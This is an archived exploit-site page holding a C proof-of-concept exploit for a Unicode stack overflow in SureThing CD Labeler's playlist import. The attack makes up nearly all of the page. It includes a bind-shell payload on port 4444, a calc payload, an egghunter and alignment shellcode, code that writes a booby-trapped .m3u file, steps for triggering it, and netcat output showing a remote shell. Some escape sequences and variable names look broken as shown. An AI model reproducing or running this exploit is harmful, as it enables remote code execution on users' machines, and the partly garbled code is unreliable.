SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC

Posted on 08 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================
SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit
===================================================================


/*
surethingcdlabelerbofpoc.c
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SureThing cd labeler (m3u/pls) - unicode stack overflow PoC exploit
Found by: Ruben Alejandro - chap0
Author: Steven Seeley - mr_me (http://net-ninja.net/)
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Writeup: Unicode, the magic of exploiting 0x00410041 (https://net-ninja.net/blog/?p=71)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
 
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
usage:
Compile this with lcc-win32 and execute it choosing your shellcode to create the .m3u file.
Then click on 'playlists' --&gt; 'Import Playlist from Hard Drive' --&gt;
'Import playlist from a file on my computer' --&gt; for filetype select 'Generic m3u/pls file'
--&gt; open evil m3u file --&gt; boom.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mrme@backtrack:~$ nc -v 192.168.2.5 4444
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.5] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:&gt;
*/
 
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
 
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
   http://metasploit.com */
 
unsigned char bind[] =
&quot;xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49&quot;
&quot;x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36&quot;
&quot;x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34&quot;
&quot;x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41&quot;
&quot;x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e&quot;
&quot;x4fx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58&quot;
&quot;x4ex56x46x32x46x32x4bx38x45x44x4ex43x4bx58x4ex47&quot;
&quot;x45x50x4ax57x41x50x4fx4ex4bx38x4fx34x4ax41x4bx58&quot;
&quot;x4fx55x42x52x41x30x4bx4ex43x4ex42x53x49x54x4bx38&quot;
&quot;x46x53x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4a&quot;
&quot;x46x58x42x4cx46x57x47x30x41x4cx4cx4cx4dx50x41x30&quot;
&quot;x44x4cx4bx4ex46x4fx4bx33x46x55x46x42x4ax42x45x57&quot;
&quot;x43x4ex4bx58x4fx55x46x52x41x50x4bx4ex48x36x4bx58&quot;
&quot;x4ex50x4bx34x4bx48x4fx55x4ex41x41x30x4bx4ex43x30&quot;
&quot;x4ex52x4bx48x49x38x4ex36x46x42x4ex41x41x56x43x4c&quot;
&quot;x41x43x42x4cx46x46x4bx48x42x54x42x33x4bx58x42x44&quot;
&quot;x4ex50x4bx38x42x47x4ex41x4dx4ax4bx48x42x54x4ax50&quot;
&quot;x50x35x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4f&quot;
&quot;x48x4dx41x53x4bx4dx48x36x43x55x48x56x4ax36x43x33&quot;
&quot;x44x33x4ax56x47x47x43x47x44x33x4fx55x46x55x4fx4f&quot;
&quot;x42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x45x4fx4f&quot;
&quot;x48x4dx4fx35x49x48x45x4ex48x56x41x48x4dx4ex4ax50&quot;
&quot;x44x30x45x55x4cx46x44x50x4fx4fx42x4dx4ax36x49x4d&quot;
&quot;x49x50x45x4fx4dx4ax47x55x4fx4fx48x4dx43x45x43x45&quot;
&quot;x43x55x43x55x43x45x43x34x43x45x43x34x43x35x4fx4f&quot;
&quot;x42x4dx48x56x4ax56x41x41x4ex35x48x36x43x35x49x38&quot;
&quot;x41x4ex45x49x4ax46x46x4ax4cx51x42x57x47x4cx47x55&quot;
&quot;x4fx4fx48x4dx4cx36x42x31x41x45x45x35x4fx4fx42x4d&quot;
&quot;x4ax36x46x4ax4dx4ax50x42x49x4ex47x55x4fx4fx48x4d&quot;
&quot;x43x35x45x35x4fx4fx42x4dx4ax36x45x4ex49x44x48x38&quot;
&quot;x49x54x47x55x4fx4fx48x4dx42x55x46x35x46x45x45x35&quot;
&quot;x4fx4fx42x4dx43x49x4ax56x47x4ex49x37x48x4cx49x37&quot;
&quot;x47x45x4fx4fx48x4dx45x55x4fx4fx42x4dx48x36x4cx56&quot;
&quot;x46x46x48x36x4ax46x43x56x4dx56x49x38x45x4ex4cx56&quot;
&quot;x42x55x49x55x49x52x4ex4cx49x48x47x4ex4cx36x46x54&quot;
&quot;x49x58x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x54&quot;
&quot;x4dx32x50x4fx44x54x4ex52x43x49x4dx58x4cx47x4ax53&quot;
&quot;x4bx4ax4bx4ax4bx4ax4ax46x44x57x50x4fx43x4bx48x51&quot;
&quot;x4fx4fx45x57x46x54x4fx4fx48x4dx4bx45x47x35x44x35&quot;
&quot;x41x35x41x55x41x35x4cx46x41x50x41x35x41x45x45x35&quot;
&quot;x41x45x4fx4fx42x4dx4ax56x4dx4ax49x4dx45x30x50x4c&quot;
&quot;x43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x33x4fx4f&quot;
&quot;x42x4dx4bx58x47x45x4ex4fx43x38x46x4cx46x36x4fx4f&quot;
&quot;x48x4dx44x55x4fx4fx42x4dx4ax36x4fx4ex50x4cx42x4e&quot;
&quot;x42x36x43x55x4fx4fx48x4dx4fx4fx42x4dx5a&quot;;
 
unsigned char calc[] =
&quot;xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49&quot;
&quot;x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41&quot;
&quot;x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42&quot;
&quot;x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b&quot;
&quot;x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55&quot;
&quot;x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c&quot;
&quot;x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b&quot;
&quot;x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49&quot;
&quot;x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51&quot;
&quot;x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50&quot;
&quot;x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34&quot;
&quot;x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51&quot;
&quot;x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31&quot;
&quot;x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50&quot;
&quot;x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30&quot;
&quot;x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c&quot;
&quot;x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a&quot;
&quot;x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a&quot;
&quot;x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43&quot;
&quot;x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45&quot;
&quot;x50x41x41&quot;;
 
// unicode encoded egghunter
unsigned char egghunter[] =
&quot;PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ&quot;
&quot;1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY&quot;
&quot;AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J&quot;
&quot;O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA&quot;;
 
// venetian shellcode
unsigned char getAddressAndAlignEaxThenJmp[] =
&quot;x58x6dx58x6dx58x6dx58x6dx05x02x22x6dx2dx02x11x6d&quot;
&quot;x2dx02x11x6dx50x6dxc3&quot;;
 
unsigned char tag[] = &quot;x77x30x30x74x77x30x30x74&quot;;
 
int main ( int argc , char * argv[])
{
    FILE* expfle = NULL;
    char* SEH = &quot;x72x73&quot;; // CALL DWORD PTR SS:[EBP-4] from dwwin.dll
    char* NSEH = &quot;x41x6d&quot;;    int i;
 
    printf(&quot;
***************************************************************************
&quot;);
    printf(&quot;	SureThing CD Labeler Unicode stack overflow PoC Exploit
&quot;);
    printf(&quot;	Found by: Ruben Alejandro - chap0
&quot;);
    printf(&quot;	Code by: Steven Seeley - mr_me
&quot;);
    printf(&quot;	http://www.net-ninja.net/
&quot;);
    printf(&quot;***************************************************************************
&quot;);
 
    if( (expfle=fopen(&quot;cst-surethingcdlabeler.m3u&quot;,&quot;wb&quot;)) ==NULL )
    {
         perror(&quot;
[-] Cannot create the exploit file..&quot;);
         exit(0);
    }
 
                for (i=0; i&lt;8; i++)
                {
                    fwrite(&quot;x41&quot;, 1, 1, expfle); // junk
                }
 
                fwrite(egghunter, sizeof(egghunter)-1, 1, expfle); // egghunter
 
                for (i=0; i&lt;62; i++)
                {
                    fwrite(&quot;x41&quot;, 1, 1, expfle); // junk
                }
 
                fwrite(nseh, sizeof(nseh)-1, 1, expfle); // nseh - walk
                fwrite(seh, sizeof(seh)-1, 1, expfle); // seh - unicode friendly
                fwrite(getAddressAndAlignEaxThenJmp, // custom unicode shellcode
                sizeof(getAddressAndAlignEaxThenJmp)-1, 1, expfle);
 
                for (i=0; i&lt;405; i++)
                {
                    fwrite(&quot;x41&quot;, 1, 1, expfle); // junk
                }
 
                fwrite(tag, sizeof(tag)-1, 1, expfle); // egghunter tag
 
                printf (&quot;
[+] Enter shellcode option: 
&quot;);
                printf (&quot;
	1. Bindshell on port 4444&quot;);
                printf (&quot;
	2. Calc.exe
&quot;);
                scanf (&quot;%d&quot;,&amp;i);
 
                if (i == 1){
                    fwrite(bind, sizeof(bind)-1, 1, expfle); // bind
                }
                else if (i == 2){
                    fwrite(calc, sizeof(calc)-1, 1, expfle); // calc
                }
 
                fclose(expfle);
                printf(&quot;
[+] cst-surethingcdlabeler.m3u created successfully! 
&quot;);
 
    return 0;
 
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20